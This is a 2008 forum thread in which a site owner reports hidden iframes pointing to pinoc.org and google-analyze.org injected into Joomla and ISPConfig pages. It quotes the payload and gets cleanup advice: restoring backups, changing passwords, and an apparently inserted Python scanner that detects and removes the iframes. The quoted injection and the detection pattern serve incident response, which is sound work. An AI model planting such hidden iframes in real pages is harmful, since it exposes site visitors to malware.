HowtoForge Forums > ISPConfig 2 > General

  #1  
18th August 2008, 19:58
biznes24 (Junior Member)
My pages were infected - PLEASE HELP!

Hi,

My site was infected by code added to the end of every file in the web directory.
The code the cracker put in is:
PHP Code:
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe
What can I do now? I have 36 domains infected. What is the command on Ubuntu to remove this line of code in all domains? How can I secure against this next time?

rgds
#2
18th August 2008, 20:26
Ben (Moderator)

Looks like you have some badly coded software that is not escaping input received from a user. On what pages do you find that code? E.g. if this is a forum you have to look inside the database and not in specific files.

And there won't be a "command" to erase those lines and keep your server safe in the future.
First you have to analyse where those lines occur, so that you can find the weak parts in your server.
#3
18th August 2008, 20:36
biznes24 (Junior Member)

Quote:
Originally Posted by Ben
Looks like you have some badly coded software that is not escaping input received from a user. On what pages do you find that code?
I find it in all files of my Joomla 1.5.6. I also find it in the page that is created when a new domain is made in ISPConfig, please look:
PHP Code:
<HTML>
<HEAD>
<TITLE>Welcome!</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" leftMargin=0 topMargin=0 rightMargin=0 marginheight="0" marginwidth="0">
<CENTER>
<TABLE BORDER="0" WIDTH="100%" CELLSPACING="0">
  <TR>
    <TD BGCOLOR="#025CCA" ALIGN="CENTER">
    <HR SIZE="1" COLOR="#FFFFFF">
    <TABLE>
      <TR>
        <TD><FONT SIZE="3" COLOR="#FFFFFF" FACE="Helvetica, Arial"><B>Welcome
          to
          <!--ADRESSE//-->www<!--ADRESSE//-->
        </B></FONT></TD>
      </TR>
    </TABLE>
    <HR SIZE="1" COLOR="#FFFFFF">
    </TD>
  </TR>
  <TR>
    <TD BGCOLOR="#FFFFFF">
    <BR><BR><CENTER>
        <FONT COLOR="#000000" SIZE="2" FACE="Helvetica, Arial">This is the standard index of your website. You can easily delete it or replace it with another file. This is the index.html file
        in the <B>web</B> directory.
        <P>For questions or problems please contact the server administrator.</FONT> </CENTER>
        <BR>
        <HR SIZE="1" WIDTH="90%">
      <CENTER>
        <FONT SIZE="1" COLOR="#000000" FACE="Verdana, Arial">powered by <A HREF="http://www.ispconfig.org">ISPConfig</A></FONT>
      </CENTER>
    </TD>
  </TR>
</TABLE>
</CENTER>
</BODY>
</HTML><iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe
What now if I remove it? Will he come back and infect it again? Because he infected random domains on 14-08-2008.
#4
18th August 2008, 21:19
gdaddy (Junior Member)
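The first post asks for a command that removes the appended iframes across all 36 domains, and Ben's reply says the first step is to see where those lines occur. The script below is an added example, not from the thread or from ISPConfig: it inventories every web file under a root that carries the iframes quoted above, optionally strips them while preserving the original as <file>.infected for later analysis, and assumes an ISPConfig 2 style /var/www layout (demo() builds a constructed tree instead of touching a real server).

```python
import re
import tempfile
from pathlib import Path

# Hosts of the two hidden iframes quoted in the thread; extend for other campaigns.
INJECTED_HOSTS = ("pinoc.org", "google-analyze.org")
# One iframe at a known host; the final '>' is optional because the quoted payload
# ends with a truncated '</iframe'.
IFRAME_RE = re.compile(
    r'<iframe\s+src="https?://(?:' + "|".join(map(re.escape, INJECTED_HOSTS))
    + r')/[^"]*"[^>]*>\s*</iframe>?', re.IGNORECASE)
SCAN_SUFFIXES = {".html", ".htm", ".php", ".js", ".tpl"}
SAMPLE_INJECTION = (  # constructed copy of the payload quoted in the post
    '<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'
    '<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe')

def find_injections(text):
    """Return every injected iframe tag found in text (empty list when clean)."""
    return IFRAME_RE.findall(text)

def clean_text(text):
    """Return (text with the injected iframes removed, number removed)."""
    return IFRAME_RE.subn("", text)

def scan_webroots(root, clean=False):
    """Walk root (assumed: /var/www on an ISPConfig 2 host) and map each affected
    file to its hit count. With clean=True the tags are stripped in place and the
    original is preserved beside it as <file>.infected for later analysis."""
    hits = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="surrogateescape")
        n = len(find_injections(text))
        if n:
            hits[str(path)] = n
            if clean:
                path.with_suffix(path.suffix + ".infected").write_bytes(path.read_bytes())
                path.write_text(clean_text(text)[0], encoding="utf-8", errors="surrogateescape")
    return hits

def demo():
    """Constructed two-domain tree: one infected index.html, one clean index.php."""
    root = Path(tempfile.mkdtemp())
    for site in ("web1", "web2"):
        (root / site / "web").mkdir(parents=True)
    (root / "web1/web/index.html").write_text("<HTML></HTML>" + SAMPLE_INJECTION)
    (root / "web2/web/index.php").write_text("<?php echo 'clean'; ?>")
    return scan_webroots(root, clean=True), scan_webroots(root)  # ({...: 2}, {})
```

Run scan_webroots("/var/www") first without clean=True to get the list of affected files per domain; the .infected copies keep the evidence of which files were touched and when.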

You're better off going to the Joomla security forums and joining the other hundreds of "I've been hacked" posts. If just one of your sites, even a test domain, was not running Joomla 1.5.6 on the 14/8/8 then they will have got through the token length password reset vulnerability.

If your username was admin for any one of those sites that will be how they got in. They reset the password, to the 1st user, which by default is admin.

Don't feel too bad though, even Joomla.org got hit. But in essence, you are going to have to change all passwords for Joomla, MySQL and FTP at a minimum. Probably best to do users and ISPConfig as well.

In terms of getting rid of it, restore files from backup (big props to Joomlapack here); your content should be OK, this hack targets index.php and/or template.php. Given that what you are showing is exactly like the other Joomla hacks, I doubt this has much to do with ISPConfig. The Joomla forums will help you better.

Last edited by gdaddy; 18th August 2008 at 21:21. Reason: spelling
#5
18th August 2008, 21:25
gdaddy (Junior Member)

Oh, and I see they have got to the default ISPConfig files. Once again, restore from backup for ISPConfig; provided you make sure everything is 1.5.6 and you just restore the PHP files that create the standard ISPConfig pages, you should be OK.